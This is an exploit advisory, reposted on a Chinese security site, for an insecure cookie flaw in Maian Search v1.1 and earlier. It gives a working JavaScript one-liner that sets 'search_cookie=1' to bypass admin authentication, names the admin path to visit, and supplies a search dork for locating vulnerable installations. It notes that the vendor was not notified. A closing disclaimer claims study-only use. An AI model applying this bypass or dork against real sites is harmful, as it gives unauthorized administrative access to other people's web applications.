Maian Search _Exploit_网络安全_

-[*] ================================================================================ [*]-
-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-



[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by: Maian Search v1.1



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

Maian Search suffers from a insecure cookie, the admin panel only checks if the cookie

exists.
and not the content. so we can easyily craft a cookie and look like a admin.



[*] Vulnerability:

javascript:document.cookie = "search_cookie=1; path=/";


[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.



-[*] ================================================================================ [*]-
-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-

提示： 本文由神整理自网络，如有侵权请联系本站删除！
本站声明：
1、本站所有资源均来源于互联网，不保证100%完整、不提供任何技术支持；
2、本站所发布的文章以及附件仅限用于学习和研究目的;不得将用于商业或者非法用途；否则由此产生的法律后果，本站概不负责！